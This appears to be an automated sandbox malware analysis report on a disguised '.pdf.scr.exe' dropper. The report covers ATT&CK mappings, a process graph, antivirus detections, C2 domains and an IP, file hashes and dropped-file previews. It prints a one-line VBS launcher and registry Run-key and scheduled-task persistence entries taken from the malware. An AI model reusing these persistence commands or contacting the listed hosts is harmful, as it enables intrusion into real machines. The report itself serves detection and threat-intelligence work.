      DLL Side-Loading      		1
      Exploitation for Privilege Escalation      		11
      Disable or Modify Tools      		21
      Input Capture      		1
      System Time Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      System Shutdown/Reboot
      Default Accounts2
      Native API      		1
      Scheduled Task/Job      		1
      DLL Side-Loading      		11
      Deobfuscate/Decode Files or Information      		LSASS Memory1
      Account Discovery      		Remote Desktop Protocol21
      Input Capture      		Exfiltration Over Bluetooth1
      Non-Standard Port      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts2
      Command and Scripting Interpreter      		21
      Registry Run Keys / Startup Folder      		312
      Process Injection      		111
      Scripting      		Security Account Manager4
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Data Encoding      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local Accounts1
      Scheduled Task/Job      		Logon Script (Mac)1
      Scheduled Task/Job      		12
      Obfuscated Files or Information      		NTDS35
      System Information Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer1
      Remote Access Software      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon Script21
      Registry Run Keys / Startup Folder      		12
      Software Packing      		LSA Secrets341
      Security Software Discovery      		SSHKeyloggingData Transfer Size Limits1
      Non-Application Layer Protocol      		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      DLL Side-Loading      		Cached Domain Credentials121
      Virtualization/Sandbox Evasion      		VNCGUI Input CaptureExfiltration Over C2 Channel21
      Application Layer Protocol      		Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items12
      Masquerading      		DCSync2
      Process Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job121
      Virtualization/Sandbox Evasion      		Proc Filesystem11
      Application Window Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)312
      Process Injection      		/etc/passwd and /etc/shadow1
      System Owner/User Discovery      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
      Hidden Files and Directories      		Network Sniffing1
      Remote System Discovery      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 798041 Sample: 004349256789197.pdf.scr.exe Startdate: 03/02/2023 Architecture: WINDOWS Score: 100 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus detection for URL or domain 2->77 79 Sigma detected: Scheduled temp file as task from temp location 2->79 81 11 other signatures 2->81 10 004349256789197.pdf.scr.exe 40 2->10         started        14 ihgsvw.exe 2 2->14         started        16 wscript.exe 2->16         started        18 6 other processes 2->18 process3 file4 63 C:\Users\user\AppData\Local\...\ihgsvw.exe, PE32 10->63 dropped 91 Starts an encoded Visual Basic Script (VBE) 10->91 20 wscript.exe 1 10->20         started        93 Creates autostart registry keys with suspicious values (likely registry only malware) 14->93 95 Creates multiple autostart registry keys 14->95 22 RegSvcs.exe 14->22         started        24 ihgsvw.exe 16->24         started        26 ihgsvw.exe 18->26         started        28 ihgsvw.exe 18->28         started        30 conhost.exe 18->30         started        32 3 other processes 18->32 signatures5 process6 process7 34 ihgsvw.exe 2 4 20->34         started        38 RegSvcs.exe 24->38         started        40 RegSvcs.exe 26->40         started        42 RegSvcs.exe 28->42         started        file8 61 C:\Users\user\AppData\Local\...\RegSvcs.exe, PE32 34->61 dropped 83 Antivirus detection for dropped file 34->83 85 Multi AV Scanner detection for dropped file 34->85 87 Found API chain indicative of sandbox detection 34->87 89 3 other signatures 34->89 44 RegSvcs.exe 1 11 34->44         started        signatures9 process10 dnsIp11 71 december2n.duckdns.org 212.193.30.230, 49714, 49717, 49719 SPD-NETTR Russian Federation 44->71 73 december2nd.ddns.net 44->73 65 C:\Program Files (x86)\...\dhcpmon.exe, PE32 44->65 dropped 67 C:\Users\user\AppData\Roaming\...\run.dat, data 44->67 dropped 69 C:\Users\user\AppData\Local\...\tmpA401.tmp, XML 44->69 dropped 97 Protects its processes via BreakOnTermination flag 44->97 99 Uses schtasks.exe or at.exe to add and modify task schedules 44->99 101 Hides that the sample has been downloaded from the Internet (zone.identifier) 44->101 49 schtasks.exe 1 44->49         started        51 schtasks.exe 1 44->51         started        53 ihgsvw.exe 44->53         started        file12 signatures13 process14 process15 55 conhost.exe 49->55         started        57 conhost.exe 51->57         started        59 RegSvcs.exe 53->59         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      004349256789197.pdf.scr.exe45%ReversingLabsWin32.Trojan.Lisk
      004349256789197.pdf.scr.exe39%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe100%AviraDR/AutoIt.Gen
      C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe26%ReversingLabsWin32.Dropper.Generic

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      22.2.RegSvcs.exe.720000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      10.2.RegSvcs.exe.6210000.7.unpack100%AviraTR/NanoCore.fadteDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      december2nd.ddns.net100%Avira URL Cloudmalware
      december2n.duckdns.org100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      december2nd.ddns.net
      		212.193.30.230
      		truetrue
        		unknown
        december2n.duckdns.org
        		212.193.30.230
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          december2nd.ddns.nettrue
          • Avira URL Cloud: malware
          		unknown
          december2n.duckdns.orgtrue
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.autoitscript.com/autoit3/004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              212.193.30.230
              		december2nd.ddns.netRussian Federation
              		57844SPD-NETTRtrue

              General Information

              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:798041
              Start date and time:2023-02-03 17:50:31 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 16m 3s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:39
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:004349256789197.pdf.scr.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@43/45@28/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 99.7% (good quality ratio 92.4%)
              • Quality average: 78.8%
              • Quality standard deviation: 29.5%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 185
              • Number of non-executed functions: 228
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240s for sample files taking high CPU consumption

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              17:51:58AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              17:52:03Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
              17:52:06Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
              17:52:06API Interceptor1646x Sleep call for process: RegSvcs.exe modified
              17:52:06AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
              17:52:15AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              17:52:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              17:52:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
              17:52:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
              17:52:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              212.193.30.230PO.jsGet hashmaliciousBrowse
              • 212.193.30.230:6505/Vre
              payment.jsGet hashmaliciousBrowse
              • 212.193.30.230:7780/is-ready
              PO.jsGet hashmaliciousBrowse
              • 212.193.30.230:6505/Vre
              PO.jsGet hashmaliciousBrowse
              • 212.193.30.230:7780/is-ready
              NewPO.jsGet hashmaliciousBrowse
              • 212.193.30.230:7780/is-ready
              dPFhxftFKAvajay.jsGet hashmaliciousBrowse
              • 212.193.30.230:7975/Vre

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              december2nd.ddns.net026910003102350.pdf.scr.exeGet hashmaliciousBrowse
              • 212.193.30.230
              Ox0YJcdK4s.exeGet hashmaliciousBrowse
              • 212.193.30.230
              IMG_000249230.pdf.scr.exeGet hashmaliciousBrowse
              • 194.5.98.176
              december2n.duckdns.org026910003102350.pdf.scr.exeGet hashmaliciousBrowse
              • 212.193.30.230
              jjE6r0O7rF.exeGet hashmaliciousBrowse
              • 212.193.30.230
              Ox0YJcdK4s.exeGet hashmaliciousBrowse
              • 212.193.30.230
              obsERXPYBe.exeGet hashmaliciousBrowse
              • 194.5.98.176
              pu8PvGDGha.exeGet hashmaliciousBrowse
              • 194.5.98.176
              c6U3ESasLi.exeGet hashmaliciousBrowse
              • 194.5.98.176

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              SPD-NETTR026910003102350.pdf.scr.exeGet hashmaliciousBrowse
              • 212.193.30.230
              8el2WF5ixS.exeGet hashmaliciousBrowse
              • 195.133.40.130
              A3F0B643265E9895B3291658516CE2B34EB06D585BD8E.exeGet hashmaliciousBrowse
              • 212.193.30.115
              OukBj2y5jY.exeGet hashmaliciousBrowse
              • 195.133.40.200
              proof of payment & invoice copy.docx.docGet hashmaliciousBrowse
              • 212.193.30.4
              http://195.133.40.73/bins/Paralysis.armGet hashmaliciousBrowse
              • 195.133.40.73
              invoice89938.exeGet hashmaliciousBrowse
              • 212.193.30.230
              FJsd1qxDgJ.exeGet hashmaliciousBrowse
              • 195.133.40.200
              LhWQCnZEr8.exeGet hashmaliciousBrowse
              • 195.133.40.200
              Comprobant.xlsGet hashmaliciousBrowse
              • 195.133.40.200
              jwlIVLR3d6.exeGet hashmaliciousBrowse
              • 195.133.40.200
              Odeme.xlsGet hashmaliciousBrowse
              • 195.133.40.200
              Comprobante Enero.xlsGet hashmaliciousBrowse
              • 195.133.40.200
              p3TPW34SPc.exeGet hashmaliciousBrowse
              • 195.133.40.200
              Promotion Instruction & Personal Referral Link for YouTube partners.docx.scr.exeGet hashmaliciousBrowse
              • 195.133.40.102
              LiRDJvWMnF.exeGet hashmaliciousBrowse
              • 212.193.30.230
              file.exeGet hashmaliciousBrowse
              • 195.133.40.119
              HEUR-Trojan.Win32.Crypt.gen-e026bc9a0b7ac31a8.exeGet hashmaliciousBrowse
              • 212.193.30.115
              D677F86403915B15AB62B1278CC7E6A8F2A98DE2BA6A8.exeGet hashmaliciousBrowse
              • 212.193.30.115
              invoice_78336.xlsmGet hashmaliciousBrowse
              • 212.193.30.230

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:true
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

              Download File
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\dhcpmon.exe.log

              Download File
              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):142
              Entropy (8bit):5.090621108356562
              Encrypted:false
              SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
              MD5:8C0458BB9EA02D50565175E38D577E35
              SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
              SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
              SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
              Malicious:false
              Reputation:unknown
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

              C:\Users\user\AppData\Local\Temp\Folder10_51\Update.vbs

              Download File
              Process:C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):151
              Entropy (8bit):5.088165235670747
              Encrypted:false
              SSDEEP:3:FER/n0eFH5OerbJSRE2J5xAIzbgDU4AdjNerbJSRE2J5xAIzbgRoeqn:FER/lFHIe0i23fzbgDUPjNe0i23fzbg2
              MD5:A9A3C2871C5B661CFE0BD95B12693457
              SHA1:E8C39E23AE2DF49D7D9C461BE91C20FF1B4FDB44
              SHA-256:C64E277FBBCB7B0B7693A0EA11925A1AB3C966723A97A2381851EE269DA571AF
              SHA-512:44B1D4E5CF629E6A91B32721B9B7E2939455DB0ACAEC08DE68E8512CB0C6503BE549E09C3E28E0EAFCB32812B72E398EF471FB39BDF3EF4E15AB3AF58BA63CDE
              Malicious:false
              Reputation:unknown
              Preview:CreateObject("WScript.Shell").Run "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC"

              C:\Users\user\AppData\Local\Temp\Folder10_51\ccmbpoh.docx

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:data
              Category:dropped
              Size (bytes):121649618
              Entropy (8bit):7.0364100465274175
              Encrypted:false
              SSDEEP:196608:NFJK4YyNlildTiCgW6hwsT3mYfb4tMV6zlR5+gmtZtQJYuPng/Kj8nGj3AExAcYc:g
              MD5:004A5D8E43630E4D5DB63A5BB6159FCC
              SHA1:285BD4A523DC7B93B0EFB86978D0FA4591E45D85
              SHA-256:9D5D8B0428D63CC43A9503591D94C62CD1606C26732735A2A950CA63147B367B
              SHA-512:F7756E3FB6B82FB75C53B6CAB6BA5E97B7774ED61F41549E222038FB3C745BD2784FC85D8ECC4DAAD7F09139A73C8E44863BC07E226AF71B4292609774034CD4
              Malicious:false
              Reputation:unknown
              Preview:..;.....?..li....A.m.....E.6...BO....12...R.g.&...T.......W...*D7.24.r....tE.....mX.IU.$..kX...........#.c.s..u.o[x..(+LK.z.....k....CmIV..=m..`r6.[.....2~9Y....I.5....%.0Ld.."YMT.....cEN1....,..m!.j{...9d]..9..`j..Y....-.*.....w...]...v......5.3.H.9.7.3.x.5.8.4.4.1.b.O.5.Q.8.m.X.4.8.2.L.....m.s.A.q.C.q.W.4.6.Z.7.8.3.p.4.0.0.9.4.9.4.1.e.7.6.9.Q.3.1.2.5.E.0.3.1.1.3.4.w.2.1.e.Y.Q.y.u.h.5.......!....S.[.=G..di.~..e4Z...%...s..}9.Z..v.J.."..L......OG.....`.4{[.UZld4..{c..Y...+...wp..gg<$.3......M.K...P.x......h......G..x.E...Jat.....G....!.....!6.o..+...R|.X...#l.. 0...!..8.[.*.Y.......G....5.......r^...\{sH."..rKN......4.1.9.N.4.e.n.d.0.0.h.V.9.C.3.6.4.s.2.T.5.2.9.9.S.3.9.7.p.g.1.7.8.J.8.2.7.Y.l.1.........'@.0...~@...`..i7......&.h.+9yb[m....$...d0.-(.r...ah'.@.....5.i.h.1.d.M.v.N.9.4.N.1.1.3.8.I.0.e.V.d.q.4.K.7.7.5.7.y.M.5.1.0.1.e.3.4.3.8.4.3.....f.K.aX,.D..Lo.+.Z.(6Z0r..!l.yu...0+z\...,...aK..R.....H.=5...o,C..}&n,.h..'..._y...o.#vOo.D.}|.....=.}.]..A...E

              C:\Users\user\AppData\Local\Temp\Folder10_51\cdjr.ktl

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:ASCII text, with very long lines (65536), with no line terminators
              Category:dropped
              Size (bytes):407473
              Entropy (8bit):4.048588207938584
              Encrypted:false
              SSDEEP:
              MD5:48F9952AAAFE4CA15D39581E78889AC0
              SHA1:569F6FB010FEFB412192A968784DB355B8311853
              SHA-256:7F322D3E2096AA1F60CBF945595F155314D434A4FDD5A35640DF9363570FE666
              SHA-512:BAE18549694F7D75F24D057F21380C30CA6F9C7579EE3D4EAD2F4CAFF92E541797ABFA970688170501DE1EA378B5F0CAF071B46BD7C28030D6C15EFBA5296B87
              Malicious:false
              Reputation:unknown
              Preview:0x4D5*9--3---04---FFFF--_8-------4-----------------------------------08----E/F_*0E-_409CD2/_80/4CCD2/546869732070726F67726/6D20636/6E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0*24-------5045--4C0/03-*/27E954--------E--E0/0_0/06--C80/--7E0/-----92E70/--2-----2---4--02----2--04-------04--------*-3--02------02-----/--0/----0/--0/------0/-----------038E70/-57----2-2-787*0/-------------------02-0C----------------------------------------------------2---8-----------082--048-----------2E74657874---98C70/--2---0C80/--02--------------2--0602E72656C6F63--0C-----02--02---C*0/-------------4--0422E72737263---787*0/--2-2--7C0/--CC0/-------------4--04----------------074E70/-----48---02-05-E4D6--54/-/-03---CE0/-06CCC4--/8/2------------------------------------------/33-3-5/---0/--//026F35--0*/82E02/62*026F36--0*/E2D0*2606/69//F0*2E332_030*2_F406/69/20*C---330E06/79//F0F3/0706/79//F2032/606/69/20C---0330*06/79/20*8---2E02/62*/72*---033-9-45-------7337--0*/92D28267338--0*/72D26267339--0*/62C242673

              C:\Users\user\AppData\Local\Temp\Folder10_51\cfciwbpw.xl

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):588
              Entropy (8bit):6.213002454543603
              Encrypted:false
              SSDEEP:
              MD5:F821802654AA671984C34C52D1CDCFD4
              SHA1:D4E04EFDB9402CA2090A8602C54B84400ABC71A1
              SHA-256:4BB1B7DE0C409D831CE769B0ACB7ED9F753710B487D3B6135C5758DD0AAFD86C
              SHA-512:8DAB9616753F29F84BAA87012F6FEA6A0185DF12BCE18D334DFF95AC77210EF25680EAD8FC034F60D0EBB40B4D78FA814902F1EE49519E813E9A91FFE3F36AAB
              Malicious:false
              Reputation:unknown
              Preview:.........................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\crldjt.icm

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):524
              Entropy (8bit):6.2118134349266025
              Encrypted:false
              SSDEEP:
              MD5:046256AD551F6765F23E871E20A666A5
              SHA1:79FF6979F39E5DCFA15B81922E947B19B4A4D6B0
              SHA-256:08248EBE1BCE86EA542860C50CCD847580D22CB133A78D524B5D1C714CBBB331
              SHA-512:57BB2D43E8263F6B2F9D37A609940B7BB8B8A0C324451FAA78AD8A35264DA04D3461B58787C3632D7506D2F52D49032B20716FBB8060014FD098FE830F6820BA
              Malicious:false
              Reputation:unknown
              Preview:.......................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\dftbvs.bmp

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):607
              Entropy (8bit):6.201298305828523
              Encrypted:false
              SSDEEP:
              MD5:043E8B1857BEEABA3718A7F3847122D5
              SHA1:7BB750324587EDB34690AA0B789869B15406ECDD
              SHA-256:9524F0E243E06157AFAAD36B50DAF38166331029B5226C16543B2F7AEA1F4E2F
              SHA-512:D7F29E19A3162697D314DD98B3C11E1DDAE2768C79F7E25F96D36D38E5AC2FF0F15BB2DBE9A3F19AADF2430554865099B8F12C9B07C005C8E835CB16FFADA2FA
              Malicious:false
              Reputation:unknown
              Preview:.................................................................................................................6................................................................&................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\fkjavmq.jpg

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):539
              Entropy (8bit):6.206196757309823
              Encrypted:false
              SSDEEP:
              MD5:6E72ACECBCA63A02F17F09893C4ECC5B
              SHA1:B667E4B9DD2659CF40784B523AB6ECAFC715C452
              SHA-256:B6C25984BEEC32852E2AB5E928F7099DE75BAED20852749A603ED89EFC219E63
              SHA-512:E1CF9C9DAA24A5B4099AE18DDB4E6E9B572ED9251E13BE0D804D3A35E9F0171EB4420921CFAB625058744209D9E6604FC370F1B365CDB60ABFFCEF162E366458
              Malicious:false
              Reputation:unknown
              Preview:....................................................................................;...................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\hvwq.msc

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):572
              Entropy (8bit):6.2074620354651575
              Encrypted:false
              SSDEEP:
              MD5:4BD4541ADFD4E488EACDFF04D29183BE
              SHA1:46FF43B901FE30FC60D07FD8F913BDB9B7C7756D
              SHA-256:0C5F56ABB0BC00576718A0554507D9068FB7E83E4E3B44FE5435371467AD160C
              SHA-512:58E109BC252B51DE3770B5062759158E359D47E51682E66D9E693585BB64E3425D54D3DB4EB3D95B43AE6B2D18F724480594885A363D29CE6DCC9C27436B613F
              Malicious:false
              Reputation:unknown
              Preview:.......................................................................................................................................................................!............................

              C:\Users\user\AppData\Local\Temp\Folder10_51\igkuh.pdf

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:Unicode text, UTF-8 text, with CRLF line terminators
              Category:dropped
              Size (bytes):669
              Entropy (8bit):6.256842582335099
              Encrypted:false
              SSDEEP:
              MD5:D20C31B84E18489E4E27B1D5591E9F45
              SHA1:7F6D3CD2F26E1E458C91FA23BB2E489737A6286D
              SHA-256:A8E5BE91B492A1B25ED40D3C9BF20B9CACF662B6C15180A77BF3033C073C292E
              SHA-512:549140F915E92F090AD58571EB544E7D18AB6E4E0D2BEABAF036D95884B12E3FD547474DBF8F793E7691D4D9F1709CF333C41E3D73FFB29791B174D1EF3A122C
              Malicious:false
              Reputation:unknown
              Preview:............................................................................................................................................................................................................................................

              C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe

              Download File
              Process:C:\Users\user\Desktop\004349256789197.pdf.scr.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):1357068
              Entropy (8bit):6.400387425104881
              Encrypted:false
              SSDEEP:
              MD5:797174324A2A71F55AD4E89DA918B52D
              SHA1:0B75AD2A9E182993A220D261F74B68D70F97398A
              SHA-256:AED1188582A5A13FF39A6C9D324BC9A5D0A8CEDB56814B1017CC35D2A6F3548E
              SHA-512:F9A1799F74EF31AB2958463D9557AD3A65D51112F90EC64674DD5675115997019248F5C920E8DEB50A12A90BA2A6EF40D2C5F00C98B3ABD4D3E081866F37B7FC
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 26%
              Reputation:unknown
